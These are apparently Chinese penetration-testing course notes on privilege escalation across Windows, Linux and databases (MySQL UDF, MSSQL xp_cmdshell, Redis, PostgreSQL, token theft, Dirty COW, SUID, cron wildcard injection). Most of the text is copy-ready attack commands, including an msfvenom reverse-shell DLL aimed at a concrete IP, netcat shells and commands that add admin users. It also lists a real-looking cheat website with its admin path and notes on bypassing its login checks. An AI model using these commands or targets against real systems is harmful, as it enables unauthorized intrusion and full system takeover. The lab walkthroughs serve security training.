小迪渗透&权限提升(捌)
文章目录
- 58. 网站权限后台漏洞第三方获取(58-64)
-
- 具体有哪些权限需要我们知道和了解掌握的?
- 演示案例:
- 59. Win溢出漏洞及AT&SC&PS提权
-
- 演示案例:
- 案例 1:如何判断使用哪种溢出漏洞?漏洞那里找?
- 案例 2:如何判断使用哪种数据库提权?数据库提权利用条件?
- 案例 3:如何判断本地环境可利用漏洞情况?AT&SC&PS 命令适用环境?
- 案例给到的思路点总结如下:
- 涉及资源
- 60. MY&MS&ORA等SQL数据库提权
-
- 演示案例:
- 61. Redis&Postgre&令牌窃取&进程注入
-
- 演示案例:
- 涉及资源
- 62. 烂土豆&dll劫持&引号路径&服务权限
-
- 必备知识点:
- 演示案例:
- 涉及资源:
- 63. Linux脏牛内漏洞&SUID&信息收集
-
- 演示案例:
- 涉及资源
- 64. Linux定时任务&环境变量&数据库
-
- 演示案例:
- 涉及资源
视频资源
58. 网站权限后台漏洞第三方获取(58-64)
当前知识点在渗透流程中的点
前面-中期-后期对应知识关系
当前知识点在权限提升的重点
知识点顺序,理解思路,分类介绍等
当前知识点权限提升权限介绍
注重理解当前权限对应可操作的事情
利用成功后的思想需要总结的思路
相关的操作被拒绝无法实现的时候就会涉及到权限提升
具体有哪些权限需要我们知道和了解掌握的?
- 后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等
后台权限:(获得方式:爆破,注入猜解,弱口令等获取的帐号密码配合登录)
一般网站或应用后台只能操作应用的界面内容数据图片等信息,无法操作程序的源代码或服务器上的资源文件的。(如后台功能存在文件操作的话也可以操作文件数据)
网站权限:(获得方式:以上三种思路获取)
查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统提权做准备。
数据库权限
操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。
接口权限(邮件,短信,支付,第三方登录等)
后台或网站权限后的获取途径:后台(修改配置信息功能点),网站权限(查看的配置文件获取),具体可以操作的事情大家自己想想。
演示案例:
某挂壁程序后台权限提升-后台功能
某 BC 广告导航页权限提升-漏洞层面
苏丹大西瓜 GlassFish 中间件-第三方
外挂网站:http://www.aanprt.com/
cms:站帮主(cms识别工具未识别出来,应该有别的方法,待定),知道cms后网上搜集信息,下载源码,得知后台地址
后台地址:http://www.aanprt.com/cms/cms/admin/,测试得知后台验证码是前端验证,可绕过,但爆破密码时会出现链接失败的问题,可能有拦截机制(代理,待定)
59. Win溢出漏洞及AT&SC&PS提权
明确权限提升基础知识:权限划分
明确权限提升环境问题:WEB 及本地
明确权限提升方法针对:针对方法适应问题
明确权限提升针对版本:个人及服务器版本;针对方法;
知识点必备:
用户及用户组权限划分;Windows 提权命令
演示案例:
基于 WEB 环境下的权限提升-阿里云靶机
基于本地环境下的权限提升-系统溢出漏洞
基于本地环境下的权限提升-AT&SC&PS 命令
案例 1:如何判断使用哪种溢出漏洞?漏洞那里找?
信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手
Vulmap,Wes,WindowsVulnScan 对比,exp 在那里获取?
案例 2:如何判断使用哪种数据库提权?数据库提权利用条件?
MSF 结合云服务器搭建组合组合拳?模拟上述操作实战演练?
搭建:https://www.cnblogs.com/M0rta1s/p/11920903.html
案例 3:如何判断本地环境可利用漏洞情况?AT&SC&PS 命令适用环境?
Vulmap,Wes,WindowsVulnScan 针对漏洞面,其他方法不同层面?
CVE-2020-0787 BitsArbitraryFileMoveExploit
at 15:13 /interactive cmd.exe
sc Create syscmd binPath= “cmd /K start” type= own type= interact
sc start syscmd
psexec.exe -accepteula -s -i -d notepad.exe
案例给到的思路点总结如下:
1.提权方法有部分适用在不同环境,当然也有通用方法
2.提权方法也有操作系统版本区分,特性决定方法利用面
3.提权方法有部分需要特定环境,如数据库,第三方提权等
涉及资源
https://github.com/vulmon/Vulmap
https://github.com/bitsadmin/wesng
https://github.com/unamer/cve-2018-8120
https://github.com/chroblert/WindowsVulnScan
https://github.com/SecWiki/windows-kernel-exploits 部分漏洞集合
https://www.cnblogs.com/M0rta1s/p/11920903.html
https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases/tag/1
https://www.cnblogs.com/M0rta1s/p/11920903.html 云服务器上安装MSF环境
60. MY&MS&ORA等SQL数据库提权
在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:
服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外,其他数据库基本都存在数据库提权的可能。
- 数据库应用提权在权限提升中的意义
- WEB 或本地环境如何探针数据库应用
- 数据库提权权限用户密码收集等方法
- 目前数据库提权对应的技术及方法等
演示案例:
MYSQL 数据库提权演示-脚本&MSF
- 流程:服务探针-信息收集-提权利用-获取权限
1.UDF 提权知识点:(基于 MYSQL 调用命令执行函数)
读取网站数据库配置文件(了解其命名规则及查找技巧)
sql data inc config conn database common include 等
读取数据库存储或备份文件(了解其数据库存储格式及对应内容)
利用脚本暴力猜解(了解数据库是否支持外联及如何开启外联)
远程本地暴力猜解,服务器本地暴力猜解
利用自定义执行函数导出 dll 文件进行命令执行
select version() ;
select @@basedir; 查看数据库的安装位置
手工创建 plugin 目录或利用 NTFS 流创建
select 'x' into dumpfile '目录/lib/plugin::INDEX_ALLOCATION';
1.mysql<5.1 导出目录 c:/windows 或 system32
2.mysql=>5.1 导出安装目录/lib/plugin/
2.MOF 知识点:(基于 MYSQL 特性的安全问题,不是很推荐)
导出自定义 mof 文件到系统目录加载
https://www.cnblogs.com/xishaonian/p/6384535.html
select load_file('C:/phpStudy/PHPTutorial/WWW/user_add.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
3.启动项知识点:(基于配合操作系统自启动)
导出自定义可执行文件到启动目录配合重启执行
将创建好的后门或执行文件进行服务器启动项写入,配合重启执行!
4.反弹知识点:(基于利用反弹特性命令执行)
nc -l -p 5577
Mssql 数据库提权演示-连接客户端
- 流程:服务探针-信息收集-提权利用-获取权限
1.使用 xp_cmdshell 进行提权
xp_cmdshell 默认在 mssql2000 中是开启的,在 mssql2005 之后的版本中则默认禁止。如果用户拥有管理员 sa 权限则可以用 sp_configure 重修开启它。
启用:
EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
关闭:
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 0;
reconfigure;
执行:
EXEC master.dbo.xp_cmdshell '命令'
如果 xp_cmdshell 被删除了,可以上传 xplog70.dll 进行恢复
exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'
2.使用 sp_oacreate 进行提权
主要是用来调用 OLE 对象,利用 OLE 对象的 run 方法执行系统命令。
启用:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
关闭:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE WITH OVERRIDE;
执行:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt'
3.使用 SQL Server 沙盒提权
参考资料:https://blog.51cto.com/11797152/2411770
exec sp_configure 'show advanced options',1;reconfigure;
-- 不开启的话在执行 xp_regwrite 会提示让我们开启,
exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;
--关闭沙盒模式,如果一次执行全部代码有问题,先执行上面两句代码。
exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
--查询是否正常关闭,经过测试发现沙盒模式无论是开,还是关,都不会影响我们执行下面的语句。
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'
-- 执 行 系 统 命 令 select * from
openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user margin margin /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators margin /add")')
沙盒模式 SandBoxMode 参数含义(默认是 2)
oracle数据库提权
普通用户模式:
前提是拥有一个普通的oracle连接账号,不需要DBA权限,可提权至DBA,并以oracle实例运行的权限执行操作系统命令。
DBA用户模式:(自动化工具演示)
拥有DBA账号密码,可以省去自己手动创建存储过程的繁琐步骤,一键执行测试。
注入提升模式: (sqlmap测试演示)
拥有一个oracle注入点,可以通过注入点直接执行系统命令,此种模式没有实现回显,需要自己验证。
61. Redis&Postgre&令牌窃取&进程注入
在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外,其他数据库基本都存在数据库提权的可能。
- 数据库应用提权在权限提升中的意义
- WEB 或本地环境如何探针数据库应用
- 数据库提权权限用户密码收集等方法
- 目前数据库提权对应的技术及方法等
演示案例:
Redis 数据库权限提升-计划任务
PostgreSQL 数据库权限提升-漏洞
Windows2008&7 令牌窃取提升-本地
Windows2003&10 进程注入提升-本地
案例 1:Redis 数据库权限提升
Redis 服务因配置不当,可被攻击者恶意利用。黑客借助 Redis 内置命令,可将现有数据恶意清空;
如果 Redis 以 root 身份运行,黑客可往服务器上写入 SSH 公钥文件,直接登录服务器。
连接(未授权或有密码)-利用如下方法提权
参考:https://blog.csdn.net/fly_hps/article/details/80937837
(1).利用计划任务执行命令反弹 shell
(2).写 ssh-keygen 公钥然后使用私钥登陆
(3).权限较低往 web 物理路径写 webshell
修复方案:
注意:以下操作,均需重启 Redis 后才能生效。
绑定需要访问数据库的 IP。 将 127.0.0.1 修改为需要访问此数据库的 IP 地址。
设置访问密码。在 Redis.conf 中 requirepass 字段后,设置添加访问密码。
修改 Redis 服务运行账号。以较低权限账号运行 Redis 服务,禁用账号的登录权限。
案例 2:PostgreSQL 数据库权限提升
PostgreSQL 是一款关系型数据库。其 9.3 到 11 版本中存在一处“特性”,管理员或具有“COPY TO/FROM
PROGRAM”权限的用户,可以使用这个特性执行任意命令。
提权利用的是漏洞:CVE-2019-9193 CVE-2018-1058
连接-利用漏洞-执行-提权
参考:https://vulhub.org/#/environments/postgres/
修复方案:升级版本或打上补丁
案例 3:Windows2008&7 令牌窃取提升-本地
进行远程过程调用时请求提升权限,然后调用它从而生成特权安全令牌以执行特权操作。当系统允
许令牌不仅用于进程本身,还用于原始请求进程时,漏洞就会出现。
本地提权实验:获取会话-利用模块-窃取令牌-提权
Microsoft Windows XP Professional SP3 和之前版本
Windows Server 2003 SP2 和之前的版本
Windows Server 2003 x64 和 x64 SP2
Windows Server 2003(用于基于 Itanium 的系统 SP2 和先前版本)
Windows Server 2008 x32 x64
Windows Server 2008(用于基于 Itanium 的系统)
Windows Vista SP1 和之前的版本
Windows Vista x64 SP1 和之前的版本
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
案例 4:Windows2003&10 进程注入提升
进程注入提权是本地提权方式的一种较为老的安全技术了,利用的是注入进程的所有者实现权限共享机制,这类技术主要利用在 windows2008 之前操作系统上.所以我们需要学习后续的本地提权更多的手法才能有针对高版本的系统。
pinjector 进程注入工具针对-win2008 以前操作系统
pexec64 32 进程注入工具针对-win2008 及后操作系统-(佛系)
涉及资源
https://www.tarasco.org/security/Process_Injector/processinjector.zip
https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
62. 烂土豆&dll劫持&引号路径&服务权限
必备知识点:
令牌窃取配合烂土豆提权
单纯令牌窃取:Web 权限或本地提权
如配合烂土豆提权:Web 或数据库等权限
不带引号服务路径安全问题
服务路径提权:Web 权限或本地提权
不安全的服务权限配置问题
服务权限配置:Web 权限或本地提权(Web 几率小)
补充说明:
dll 劫持提权及 AlwaysInstallElevated 等说明
dll 劫持提权需要特定软件应用的控制权限及启用配合,复杂鸡肋
AlwaysInstallElevated 提权默认禁用配置,利用成功机会很少
演示案例:
Win2012-烂土豆配合令牌窃取提权-Web 权限
Win2012-DLL 劫持提权应用配合 MSF-Web 权限
Win2012-不安全的服务权限配合 MSF-本地权限
Win2012-不带引号服务路径配合 MSF-Web,本地权限
关于 Windows 相关知识点总结说明-权限层,系统层,防护层等
案例 1:Win2012-烂土豆配合令牌窃取提权-Web 权限
原理:参考上述图片内容,非服务类用户权限无法窃取成功(原理)
过程:上传烂土豆-执行烂土豆-利用窃取模块-窃取 SYSTEM-成功
upload /root/potato.exe C:\Users\Public
cd C:\\Users\\Public
use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
案例 2:Win2012-DLL 劫持提权应用配合 MSF-Web 权限
原理:Windows 程序启动的时候需要 DLL。如果这些 DLL 不存在,则可以通过在应用程序要查找的位置放置恶意 DLL 来提权。通常,Windows 应用程序有其预定义好的搜索 DLL 的路径,它会根据下面的顺序进行搜索:
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录 Current Working Directory,CWD
6、在 PATH 环境变量的目录(先系统后用户)
过程:信息收集-进程调试-制作 dll 并上传-替换 dll-启动应用后成功
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.169.46 lport=6677 -f dll >/opt/xiaodi.dll
案例 3:Win2012-不安全的服务权限配合 MSF-本地权限
原理:即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。
过程:检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功
accesschk.exe -uwcqv "administrators" *
sc config "NewServiceName" binpath="C:\Program.exe"
sc start "NewServiceName"
案例 4:Win2012-不带引号服务路径配合 MSF-Web,本地权限
原理:当 Windows 服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例。
过程:检测引号服务路径-利用路径制作文件并上传-启用服务或重启-调用后成功
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """
总结 Windows 提权知识点:
掌握:提权方法对应层面,提权方法对应系统版本,相关文件及后门免杀问题等
涉及资源:
https://github.com/tennc/webshell
https://www.sdbeta.com/wg/2020/0628/235361.html
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
63. Linux脏牛内漏洞&SUID&信息收集
演示案例:
Linux 提权自动化脚本利用-4 个脚本
Linux 提权 SUID 配合脚本演示-Aliyun
Linux 提权本地配合内核漏洞演示-Mozhe
Linux 提权脏牛内核漏洞演示-Aliyun,Vulnhub
案例 1-Linux 提权自动化脚本利用-4 个脚本
两个信息收集:LinEnum,linuxprivchecker
两个漏洞探针:linux-exploit-suggester linux-exploit-suggester2
需要解释:信息收集有什么用哦?漏洞探针又有什么用哦?
案例 2-Linux 提权 SUID 配合脚本演示-Vulhub
漏洞成因:chmod u+s 给予了 suid u-s 删除了 suid
使程序在运行中受到了 suid root 权限的执行过程导致
提权过程:探针是否有 SUID(手工或脚本)-特定 SUID 利用-利用吃瓜-GG
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
参考利用:https://pentestlab.blog/2017/09/25/suid-executables/
touch xiaodi
find xiaodi -exec whoami \;
find xiaodi -exec netcat -lvp 5555 -e /bin/sh \;
netcat xx.xx.xx.xx 5555
案例 3-Linux 提权本地配合内核漏洞演示-Mozhe
提权过程:连接-获取可利用漏洞-下载或上传 EXP-编译 EXP-给权限执行-GG
gcc 45010.c -o 45010
chmod +x 45010
./45010
id
案例 4-Linux 提权脏牛内核漏洞演示-linux-exploit-suggester
内核提权整个过程:(linux-exploit-suggester 获取信息哦)
vulnhub 靶机-探针目标-CMS 漏洞利用-脚本探针提权漏洞-利用内核提权-GG
内核漏洞提权过程:寻可用-下 exp-上/tmp-编译 exp-执行(无权限用 chmod)
nmap 192.168.76.0/24
nmap -p1-65535 192.168.76.141
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set lhost 192.168.76.141
set lport 1898
set target 0
run
upload /tmp/40837.cpp /tmp/40837.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
涉及资源
https://github.com/rebootuser/LinEnum
https://github.com/rebeyond/Behinder/releases
https://github.com/mzet-/linux-exploit-suggester
https://github.com/sleventyeleven/linuxprivchecker
https://pentestlab.blog/2017/09/25/suid-executables/
https://github.com/jondonas/linux-exploit-suggester-2
https://www.mozhe.cn/bug/detail/T3ZEbFljRmFKQTVjVitoV2JxUzVoQT09bW96aGUmozhe
https://www.vulnhub.com/entry/lampiao-1,249/ 最真实的靶机
64. Linux定时任务&环境变量&数据库
演示案例:
Linux 提权本地环境变量安全-Aliyun
Linux 提权本地定时任务安全-Aliyun
Linux 提权第三方服务数据库-Vulnhub
Linux 提权提升漏洞查找关注点-拓展总结
案例 1:Linux 提权本地环境变量安全-Aliyun
配合 SUID 进行环境变量提权-本地用户环境
手写调用文件-编译-复制文件-增加环境变量-执行触发
gcc demo.c -o shell
cp /bin/sh /tmp/ps
export PATH=/tmp:$PATH
./shell
id
案例 2-Linux 提权本地定时任务安全-Aliyun
第一种:路径问题
利用计划任务指向的文件的相对路径解析问题
cat /ect/crontab
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/xiaodi/test.sh
chmod +x /home/xiaodi/test.sh
/tmp/bash
第二种:命令问题
利用通配符配合命令参数自定义命令实现提权
不安全定时任务备份命令:
cd /home/undead/script;tar czf /tmp/backup.tar.gz *
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/undead/script/test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
参考命令:https://www.cnblogs.com/manong--/p/8012324.html
第三种:权限问题
利用不安全的权限分配操作导致的定时文件覆盖
chmod 777 775 等 所有者 组 其他成员说明
案例 3:Linux 提权数据库 MYSQL_UDF-Vulnhub
Vulnhub 某靶机-探针 IP 及端口-利用漏洞获取 web 权限-信息收集-查看数据库配置文件-利用 Mysql 提权 Linux(Mysql 版本区别同 Windows)
探针 IP 及端口
nmap 192.168.76.0/24
利用 phpmailer 漏洞进行修改并反弹
python D:/Myproject/40974.py
nc -lvvp 4444
写入后门利用菜刀连接方便操作
echo '' >1.php
上传信息收集脚本进行提权信息收集
./LinEnum.sh
翻阅数据库配置文件获取 root 密码
利用 Mysql 提权 searchsploit
下载 mysql udf poc 进行编译
wget https://www.exploit-db.com/download/1518
mv 1518 raptor_udf.c
gcc -g -c raptor_udf.c
gcc -g -shared -o raptor_udf.so raptor_udf.o -lc
mv raptor_udf.so 1518.so
下载 1518 到目标服务器
wget https://xx.xx.xx.xx/1518.so
进入数据库进行 UDF 导出
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
创建 do_system 函数调用
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');
配合使用 find 调用执行
touch xiaodi
find xiaodi –exec "whoami" \;
find xiaodi –exec "/bin/sh" \;
id
案例 4-Linux 提权提升简单总结归类-参考 PDF
1.提权环境,信息收集(SUID,定时任务,可能漏洞,第三方服务应用等)
2.最新相关漏洞要明确(关注点),二次开发相关脚本学会展望(四个脚本)
3.本地 searchsploit 脚本及远程 exploitdb 站点搜索说明(简要使用)
4.其他提权方法如:密码复用,guid,sudo 等说明(运气,同理,鸡肋等)
SUDO 说明参考:https://www.freebuf.com/vuls/217089.html
涉及资源
https://www.exploit-db.com/
https://www.vulnhub.com/entry/raven-2,269/
https://github.com/offensive-security/exploitdb